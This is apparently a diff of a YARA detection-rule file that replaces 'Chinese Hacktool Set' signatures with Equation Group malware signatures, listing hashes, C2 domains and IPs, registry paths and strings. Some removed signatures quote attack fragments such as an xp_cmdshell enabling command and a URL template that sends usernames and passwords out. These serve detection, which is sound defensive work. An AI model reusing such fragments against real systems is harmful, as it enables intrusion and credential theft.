+		$a4 = "?e747383_94@@YAXXZ"
+		$a5 = "?e83834@@YAXXZ"
+		$a6 = "?e929348_827@@YAXXZ"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 45KB and all of them
+		any of them
 }
-rule SIGNATURE_BASE_Webcrack4_Routerpasswordcracking : FILE
+rule SIGNATURE_BASE_Apt_Equation_Cryptotable
 {
 	meta:
-		description = "Chinese Hacktool Set - file WebCrack4-RouterPasswordCracking.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e3d50ff8-e58d-5c60-9acd-25ba95a21f68"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L749-L766"
+		description = "Rule to detect the crypto library used in Equation group malware"
+		author = "Kaspersky Lab"
+		id = "e7f313a3-8ef8-5363-898a-836a96aaa2ff"
+		date = "2015-02-16"
+		modified = "2025-03-29"
+		reference = "https://securelist.com/blog/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_equation_fiveeyes.yar#L59-L71"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "00c68d1b1aa655dfd5bb693c13cdda9dbd34c638"
-		logic_hash = "48456f82163806852ecef3d71c2c8247f6c74c31ce28472c80a914a98247bdb3"
+		logic_hash = "e660fe423330334a1e3167d6a45e5ce2469fec276838618a7cb0340ec8172275"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
+		version = "1.0"
 
 	strings:
-		$s0 = "http://www.site.com/test.dll?user=%USERNAME&pass=%PASSWORD" fullword ascii
-		$s1 = "Username: \"%s\", Password: \"%s\", Remarks: \"%s\"" fullword ascii
-		$s14 = "user:\"%s\" pass: \"%s\" result=\"%s\"" fullword ascii
-		$s16 = "Mozilla/4.0 (compatible; MSIE 4.01; Windows NT)" fullword ascii
-		$s20 = "List count out of bounds (%d)+Operation not allowed on sorted string list%String" wide
+		$a = {37 DF E8 B6 C7 9C 0B AE 91 EF F0 3B 90 C6 80 85 5D 19 4B 45 44 12 3C E2 0D 5C 1C 7B C4 FF D6 05 17 14 4F 03 74 1E 41 DA 8F 7D DE 7E 99 F1 35 AC B8 46 93 CE 23 82 07 EB 2B D4 72 71 40 F3 B0 F7 78 D7 4C D1 55 1A 39 83 18 FA E1 9A 56 B1 96 AB A6 30 C5 5F BE 0C 50 C1}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 5000KB and 2 of them
+		$a
 }
-rule SIGNATURE_BASE_Hscan_Gui : FILE
+rule SIGNATURE_BASE_Equation_Kaspersky_Triplefantasy_1 : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file hscan-gui.exe"
+		description = "Equation Group Malware - TripleFantasy http://goo.gl/ivt8EW"
 		author = "Florian Roth (Nextron Systems)"
-		id = "27f9d2e9-0a62-57ca-9061-c32945c59c7e"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L768-L783"
+		id = "8d2adb3c-70e0-5768-bcfa-be64220064d9"
+		date = "2015-02-16"
+		modified = "2025-03-29"
+		reference = "http://goo.gl/ivt8EW"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_equation_fiveeyes.yar#L75-L107"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "1885f0b7be87f51c304b39bc04b9423539825c69"
-		logic_hash = "c87cfe78324638ac9d35c7fd1e47f24014c470b0892ceceaf394278d9706157b"
+		hash = "b2b2cd9ca6f5864ef2ac6382b7b6374a9fb2cbe9"
+		logic_hash = "cfa3c1756c8dfb04e0a1590f76cad6d5b3878000d220c263d199322cf6a4f58a"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Hscan.EXE" fullword wide
-		$s1 = "RestTool.EXE" fullword ascii
-		$s3 = "Hscan Application " fullword wide
+		$s0 = "%SystemRoot%\\system32\\hnetcfg.dll" fullword wide
+		$s1 = "%WINDIR%\\System32\\ahlhcib.dll" fullword wide
+		$s2 = "%WINDIR%\\sjyntmv.dat" fullword wide
+		$s3 = "Global\\{8c38e4f3-591f-91cf-06a6-67b84d8a0102}" fullword wide
+		$s4 = "%WINDIR%\\System32\\owrwbsdi" fullword wide
+		$s5 = "Chrome" fullword wide
+		$s6 = "StringIndex" fullword ascii
+		$x1 = "itemagic.net@443" fullword wide
+		$x2 = "team4heat.net@443" fullword wide
+		$x5 = "62.216.152.69@443" fullword wide
+		$x6 = "84.233.205.37@443" fullword wide
+		$z1 = "www.microsoft.com@80" fullword wide
+		$z2 = "www.google.com@80" fullword wide
+		$z3 = "127.0.0.1:3128" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 550KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 300000 and ( ( all of ( $s* ) and all of ( $z* ) ) or ( all of ( $s* ) and 1 of ( $x* ) ) )
 }
-rule SIGNATURE_BASE_S_Multifunction_Scanners_S : FILE
+rule SIGNATURE_BASE_Equation_Kaspersky_Doublefantasy_1 : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file s.exe"
+		description = "Equation Group Malware - DoubleFantasy"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7fb90a59-116d-5fa7-b85b-cbb1af660666"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L785-L809"
+		id = "f3c87adf-86c3-5d7c-9532-75341841869a"
+		date = "2015-02-16"
+		modified = "2025-03-29"
+		reference = "http://goo.gl/ivt8EW"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_equation_fiveeyes.yar#L109-L138"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "79b60ffa1c0f73b3c47e72118e0f600fcd86b355"
-		logic_hash = "96f0692c54d74388f8602a03475d95a2fcd89692dd189f9363592745a70c234b"
+		hash = "d09b4b6d3244ac382049736ca98d7de0c6787fa2"
+		logic_hash = "4471601300616b5442de95a3eb23c28563206f3423b57fe81007d005203a439f"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "C:\\WINDOWS\\temp\\pojie.exe /l=" fullword ascii
-		$s1 = "C:\\WINDOWS\\temp\\s.exe" fullword ascii
-		$s2 = "C:\\WINDOWS\\temp\\s.exe tcp " fullword ascii
-		$s3 = "explorer.exe http://www.hackdos.com" fullword ascii
-		$s4 = "C:\\WINDOWS\\temp\\pojie.exe" fullword ascii
-		$s5 = "Failed to read file or invalid data in file!" fullword ascii
-		$s6 = "www.hackdos.com" fullword ascii
-		$s7 = "WTNE / MADE BY E COMPILER - WUTAO " fullword ascii
-		$s11 = "The interface of kernel library is invalid!" fullword ascii
-		$s12 = "eventvwr" fullword ascii
-		$s13 = "Failed to decompress data!" fullword ascii
-		$s14 = "NOTEPAD.EXE result.txt" fullword ascii
+		$z1 = "msvcp5%d.dll" fullword ascii
+		$s0 = "actxprxy.GetProxyDllInfo" fullword ascii
+		$s3 = "actxprxy.DllGetClassObject" fullword ascii
+		$s5 = "actxprxy.DllRegisterServer" fullword ascii
+		$s6 = "actxprxy.DllUnregisterServer" fullword ascii
+		$x2 = "191H1a1" fullword ascii
+		$x3 = "November " fullword ascii
+		$x4 = "abababababab" fullword ascii
+		$x5 = "January " fullword ascii
+		$x6 = "October " fullword ascii
+		$x7 = "September " fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 8000KB and 4 of them
+		uint16( 0 ) == 0x5a4d and filesize < 350000 and ( ( $z1 ) or ( all of ( $s* ) and 6 of ( $x* ) ) )
 }
-rule SIGNATURE_BASE_HKTL_CN_Dos_Getpass : FILE
+rule SIGNATURE_BASE_Equation_Kaspersky_GROK_Keylogger : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file GetPass.exe"
+		description = "Equation Group Malware - GROK keylogger"
 		author = "Florian Roth (Nextron Systems)"
-		id = "08635096-474c-5fdf-825e-6c7c8c8d4061"
-		date = "2015-06-13"
-		modified = "2023-01-06"
-		old_rule_name = "Dos_GetPass"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L811-L830"
+		id = "1bae3e86-54e5-55e9-8bbd-aa9ec2a0fa2b"
+		date = "2015-02-16"
+		modified = "2025-03-29"
+		reference = "http://goo.gl/ivt8EW"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_equation_fiveeyes.yar#L140-L172"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "d18d952b24110b83abd17e042f9deee679de6a1a"
-		logic_hash = "ea1410984fb1f66422faa943f1f16873f4e0d5ff1afa68c2d28f36889e214a52"
+		hash = "50b8f125ed33233a545a1aac3c9d4bb6aa34b48f"
+		logic_hash = "502afd23b92e948a8fba33ccc4da2f4b1ec91bce5a24d153ffc545129fd8c9fa"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "GetLogonS" ascii
-		$s3 = "/showthread.php?t=156643" ascii
-		$s8 = "To Run As Administ" ascii
-		$s18 = "EnableDebugPrivileg" fullword ascii
-		$s19 = "sedebugnameValue" fullword ascii
+		$s0 = "c:\\users\\rmgree5\\" ascii
+		$s1 = "msrtdv.sys" fullword wide
+		$x1 = "svrg.pdb" fullword ascii
+		$x2 = "W32pServiceTable" fullword ascii
+		$x3 = "In forma" fullword ascii
+		$x4 = "ReleaseF" fullword ascii
+		$x5 = "criptor" fullword ascii
+		$x6 = "astMutex" fullword ascii
+		$x7 = "ARASATAU" fullword ascii
+		$x8 = "R0omp4ar" fullword ascii
+		$z1 = "H.text" fullword ascii
+		$z2 = "\\registry\\machine\\software\\Microsoft\\Windows NT\\CurrentVersion" wide
+		$z4 = "\\registry\\machine\\SYSTEM\\ControlSet001\\Control\\Session Manager\\Environment" wide fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 890KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 250000 and ( $s0 or ( $s1 and 6 of ( $x* ) ) or ( 6 of ( $x* ) and all of ( $z* ) ) )
 }
-rule SIGNATURE_BASE_HKTL_CN_Update_Pcmain : FILE
+rule SIGNATURE_BASE_Equation_Kaspersky_Greyfishinstaller
 {
 	meta:
-		description = "Chinese Hacktool Set - file PcMain.dll"
+		description = "Equation Group Malware - Grey Fish"
 		author = "Florian Roth (Nextron Systems)"
-		id = "24c9ba6f-0772-59c9-8bea-3a8bf7823e4c"
-		date = "2015-06-13"
-		modified = "2023-01-06"
-		old_rule_name = "update_PcMain"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L832-L858"
+		id = "ea16b51c-755e-5f08-a209-d21a1ed30fcf"
+		date = "2015-02-16"
+		modified = "2025-03-29"
+		reference = "http://goo.gl/ivt8EW"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_equation_fiveeyes.yar#L174-L189"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "aa68323aaec0269b0f7e697e69cce4d00a949caa"
-		logic_hash = "aa905379f65a8d964b921f2b74b61d94f97536466a7fc48f05c437d617cf35f6"
-		score = 90
+		hash = "58d15d1581f32f36542f3e9fb4b1fc84d2a6ba35"
+		logic_hash = "dae6963f3210503c6c86c818a9cd6f309ba7876f14ca42966097023d474a2366"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322" ascii
-		$s1 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SvcHost" fullword ascii
-		$s2 = "SOFTWARE\\Classes\\HTTP\\shell\\open\\command" fullword ascii
-		$s3 = "\\svchost.exe -k " ascii
-		$s4 = "SYSTEM\\ControlSet001\\Services\\%s" fullword ascii
-		$s9 = "Global\\%s-key-event" fullword ascii
-		$s10 = "%d%d.exe" fullword ascii
-		$s14 = "%d.exe" fullword ascii
-		$s15 = "Global\\%s-key-metux" fullword ascii
-		$s18 = "GET / HTTP/1.1" fullword ascii
-		$s19 = "\\Services\\" ascii
-		$s20 = "qy001id=%d;qy001guid=%s" fullword ascii
+		$s0 = "DOGROUND.exe" fullword wide
+		$s1 = "Windows Configuration Services" fullword wide
+		$s2 = "GetMappedFilenameW" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and 4 of them
+		all of them
 }
-rule SIGNATURE_BASE_HKTL_CN_Dos_Sys : FILE
+rule SIGNATURE_BASE_Equation_Kaspersky_Equationdruginstaller : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file sys.exe"
+		description = "Equation Group Malware - EquationDrug installer LUTEUSOBSTOS"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c4b740f2-f4f8-59ff-ad1f-c06718040b50"
-		date = "2015-06-13"
-		modified = "2023-01-06"
-		old_rule_name = "Dos_sys"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L860-L878"
+		id = "fa549e6e-f0d8-55ea-9ec9-c8ec53b55dec"
+		date = "2015-02-16"
+		modified = "2025-03-29"
+		reference = "http://goo.gl/ivt8EW"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_equation_fiveeyes.yar#L191-L213"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b5837047443f8bc62284a0045982aaae8bab6f18"
-		logic_hash = "3b3f55c45ebfe4ab6d8e6b06a3c452c84d4f755f984d913c683a49a8fd570d9d"
+		hash = "61fab1b8451275c7fd580895d9c68e152ff46417"
+		logic_hash = "815ed47a53bbc5f6c3fec3464336863028e804bde4681526ecac5de0cfff21b4"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "'SeDebugPrivilegeOpen " fullword ascii
-		$s6 = "Author: Cyg07*2" fullword ascii
-		$s12 = "from golds7n[LAG]'J" fullword ascii
-		$s14 = "DAMAGE" fullword ascii
+		$s0 = "\\system32\\win32k.sys" wide
+		$s1 = "ALL_FIREWALLS" fullword ascii
+		$x1 = "@prkMtx" fullword wide
+		$x2 = "STATIC" fullword wide
+		$x3 = "windir" fullword wide
+		$x4 = "cnFormVoidFBC" fullword wide
+		$x5 = "CcnFormSyncExFBC" fullword wide
+		$x6 = "WinStaObj" fullword wide
+		$x7 = "BINRES" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 150KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 500000 and all of ( $s* ) and 5 of ( $x* )
 }
-rule SIGNATURE_BASE_HKTL_CN_Dat_Xpf : FILE
+rule SIGNATURE_BASE_Equation_Kaspersky_Equationlaserinstaller : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file xpf.sys"
+		description = "Equation Group Malware - EquationLaser Installer"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fe2de535-4f86-5c29-b67e-153423a897f7"
-		date = "2015-06-13"
-		modified = "2023-01-06"
-		old_rule_name = "dat_xpf"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L880-L897"
+		id = "15fd5668-36f2-556c-8150-225d3cbd4121"
+		date = "2015-02-16"
+		modified = "2025-03-29"
+		reference = "http://goo.gl/ivt8EW"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_equation_fiveeyes.yar#L215-L236"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "761125ab594f8dc996da4ce8ce50deba49c81846"
-		logic_hash = "c46b10ef17a9fee2be15fc9cc8b8aeec94d656b86e7208e1ad1f5efcd95fddf5"
-		score = 75
+		hash = "5e1f56c1e57fbff96d4999db1fd6dd0f7d8221df"
+		logic_hash = "6f8ba26f5efaa7ec422171862e1b645472387395f0be3a4625d58de5f0584c0b"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "UnHook IoGetDeviceObjectPointer ok!" fullword ascii
-		$s2 = "\\Device\\XScanPF" wide
-		$s3 = "\\DosDevices\\XScanPF" wide
+		$s0 = "Failed to get Windows version" fullword ascii
+		$s1 = "lsasrv32.dll and lsass.exe" fullword wide
+		$s2 = "\\\\%s\\mailslot\\%s" fullword ascii
+		$s3 = "%d-%d-%d %d:%d:%d Z" fullword ascii
+		$s4 = "lsasrv32.dll" fullword ascii
+		$s6 = "%s %02x %s" fullword ascii
+		$s7 = "VIEWERS" fullword ascii
+		$s8 = "5.2.3790.220 (srv03_gdr.040918-1552)" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 25KB and all of them
+		( uint16( 0 ) == 0x5a4d ) and filesize < 250000 and 6 of ( $s* )
 }
-rule SIGNATURE_BASE_HKTL_CN_Project1 : FILE
+rule SIGNATURE_BASE_Equation_Kaspersky_Fannyworm : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file Project1.exe"
+		description = "Equation Group Malware - Fanny Worm"
 		author = "Florian Roth (Nextron Systems)"
-		id = "12cc7a82-d7a9-58c6-b283-3bb0df477cd8"
-		date = "2015-06-13"
+		id = "1b8d1ce6-8926-5aa3-8fba-6a8451d66a7d"
+		date = "2015-02-16"
 		modified = "2023-01-06"
-		old_rule_name = "Project1"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L899-L916"
+		reference = "http://goo.gl/ivt8EW"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_equation_fiveeyes.yar#L238-L277"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "d1a5e3b646a16a7fcccf03759bd0f96480111c96"
-		logic_hash = "c26590f13a185eb42a27d27e6b5996f7fdf4d5c146fb74062686f356ec4db47d"
-		score = 75
+		hash = "1f0ae54ac3f10d533013f74f48849de4e65817a7"
+		logic_hash = "57e938ba1e53eeb99491547f53086eae3fc4d50bc5612e1b5ae6da6b029ac49e"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'" fullword ascii
-		$s2 = "Password.txt" fullword ascii
-		$s3 = "LoginPrompt" fullword ascii
+		$s1 = "x:\\fanny.bmp" fullword ascii
+		$s2 = "32.exe" fullword ascii
+		$s3 = "d:\\fanny.bmp" fullword ascii
+		$x1 = "c:\\windows\\system32\\kernel32.dll" fullword ascii
+		$x2 = "System\\CurrentControlSet\\Services\\USBSTOR\\Enum" fullword ascii
+		$x3 = "System\\CurrentControlSet\\Services\\PartMgr\\Enum" fullword ascii
+		$x4 = "\\system32\\win32k.sys" wide
+		$x5 = "\\AGENTCPD.DLL" ascii
+		$x6 = "agentcpd.dll" fullword ascii
+		$x7 = "PADupdate.exe" fullword ascii
+		$x8 = "dll_installer.dll" fullword ascii
+		$x9 = "\\restore\\" ascii
+		$x10 = "Q:\\__?__.lnk" fullword ascii
+		$x11 = "Software\\Microsoft\\MSNetMng" fullword ascii
+		$x12 = "\\shelldoc.dll" ascii
+		$x13 = "file size = %d bytes" fullword ascii
+		$x14 = "\\MSAgent" ascii
+		$x15 = "Global\\RPCMutex" fullword ascii
+		$x16 = "Global\\DirectMarketing" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 5000KB and all of them
+		( uint16( 0 ) == 0x5a4d ) and filesize < 300000 and ( ( 2 of ( $s* ) ) or ( 1 of ( $s* ) and 6 of ( $x* ) ) or ( 14 of ( $x* ) ) )
 }
-rule SIGNATURE_BASE_Arp_EMP_V1_0 : FILE
+rule SIGNATURE_BASE_Equation_Kaspersky_HDD_Reprogramming_Module : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file Arp EMP v1.0.exe"
+		description = "Equation Group Malware - HDD reprogramming module"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b2552f26-47ac-5fa0-941e-d674f9deccac"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L918-L931"
+		id = "09ffe270-39e7-5225-b4a9-1c8d312a09c1"
+		date = "2015-02-16"
+		modified = "2025-03-29"
+		reference = "http://goo.gl/ivt8EW"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_equation_fiveeyes.yar#L279-L297"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "ae4954c142ad1552a2abaef5636c7ef68fdd99ee"
-		logic_hash = "e46b0f730945dad3c75b6865f30005f4d5fa09c53e3a27c275ca22da9cc89e8d"
+		hash = "ff2b50f371eb26f22eb8a2118e9ab0e015081500"
+		logic_hash = "65800e5f122dce1dd4473bc8cebce0f9258b38d570118b154dbaf6939b68f925"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Arp EMP v1.0.exe" fullword wide
+		$s0 = "nls_933w.dll" fullword ascii
+		$s1 = "BINARY" fullword wide
+		$s2 = "KfAcquireSpinLock" fullword ascii
+		$s3 = "HAL.dll" fullword ascii
+		$s4 = "READ_REGISTER_UCHAR" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 800KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 300000 and all of ( $s* )
 }
-rule SIGNATURE_BASE_CN_Tools_Myupnp : FILE
+rule SIGNATURE_BASE_Equation_Kaspersky_EOP_Package : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file MyUPnP.exe"
+		description = "Equation Group Malware - EoP package and malware launcher"
 		author = "Florian Roth (Nextron Systems)"
-		id = "394e19d3-882e-5a7c-a3a0-e662bd67955c"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L933-L948"
+		id = "2eb97873-a415-57be-a8fb-70ef86a99c9b"
+		date = "2015-02-16"
+		modified = "2025-03-29"
+		reference = "http://goo.gl/ivt8EW"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_equation_fiveeyes.yar#L299-L318"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "15b6fca7e42cd2800ba82c739552e7ffee967000"
-		logic_hash = "0bdd0d98dc5218bbe799e5e510c5f27d74a1ef398b09962f4267f846088f726e"
+		hash = "2bd1b1f5b4384ce802d5d32d8c8fd3d1dc04b962"
+		logic_hash = "abbc562b8e822422ae1852a5675a680e797a6af0be5581a8482785bd0c1ad1bf"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "<description>BYTELINKER.COM</description>" fullword ascii
-		$s2 = "myupnp.exe" fullword ascii
-		$s3 = "LOADER ERROR" fullword ascii
+		$s0 = "abababababab" fullword ascii
+		$s1 = "abcdefghijklmnopq" fullword ascii
+		$s2 = "@STATIC" fullword wide
+		$s3 = "$aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" fullword ascii
+		$s4 = "@prkMtx" fullword wide
+		$s5 = "prkMtx" fullword wide
+		$s6 = "cnFormVoidFBC" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1500KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 100000 and all of ( $s* )
 }
-rule SIGNATURE_BASE_CN_Tools_Shiell : FILE
+rule SIGNATURE_BASE_Equation_Kaspersky_Triplefantasy_Loader : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file Shiell.exe"
+		description = "Equation Group Malware - TripleFantasy Loader"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7ac7d79d-3f4e-54e7-bb97-ce94cbbb40a2"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L950-L966"
+		id = "562e7855-f011-5985-91c0-622b2fec32f8"
+		date = "2015-02-16"
+		modified = "2025-03-29"
+		reference = "http://goo.gl/ivt8EW"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_equation_fiveeyes.yar#L320-L342"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b432d80c37abe354d344b949c8730929d8f9817a"
-		logic_hash = "44c494c24c090b21c3c201d57f910e8f4d5132a863715a090fa1e18c9d349d48"
+		hash = "4ce6e77a11b443cc7cbe439b71bf39a39d3d7fa3"
+		logic_hash = "f49735a587085e95f1a8e405e42e5ff3eb4beda1f26c7b4c3c0a33bec21f48c7"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "C:\\Users\\Tong\\Documents\\Visual Studio 2012\\Projects\\Shift shell" ascii
-		$s2 = "C:\\Windows\\System32\\Shiell.exe" fullword wide
-		$s3 = "Shift shell.exe" fullword wide
-		$s4 = "\" /v debugger /t REG_SZ /d \"" fullword wide
+		$x1 = "Original Innovations, LLC" fullword wide
+		$x2 = "Moniter Resource Protocol" fullword wide
+		$x3 = "ahlhcib.dll" fullword wide
+		$s0 = "hnetcfg.HNetGetSharingServicesPage" fullword ascii
+		$s1 = "hnetcfg.IcfGetOperationalMode" fullword ascii
+		$s2 = "hnetcfg.IcfGetDynamicFwPorts" fullword ascii
+		$s3 = "hnetcfg.HNetFreeFirewallLoggingSettings" fullword ascii
+		$s4 = "hnetcfg.HNetGetShareAndBridgeSettings" fullword ascii
+		$s5 = "hnetcfg.HNetGetFirewallSettingsPage" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1500KB and 2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 50000 and ( all of ( $x* ) and all of ( $s* ) )
 }
-rule SIGNATURE_BASE_Cndcom_Cndcom : FILE
+rule SIGNATURE_BASE_Equation_Kaspersky_Suspiciousstring : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file cndcom.exe"
+		description = "Equation Group Malware - suspicious string found in sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b1acfe34-03b8-5909-a226-3325fe8629ab"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L968-L988"
+		id = "a5f203a7-0c50-5658-89f4-44533ed4eef0"
+		date = "2015-02-17"
+		modified = "2025-03-29"
+		reference = "http://goo.gl/ivt8EW"
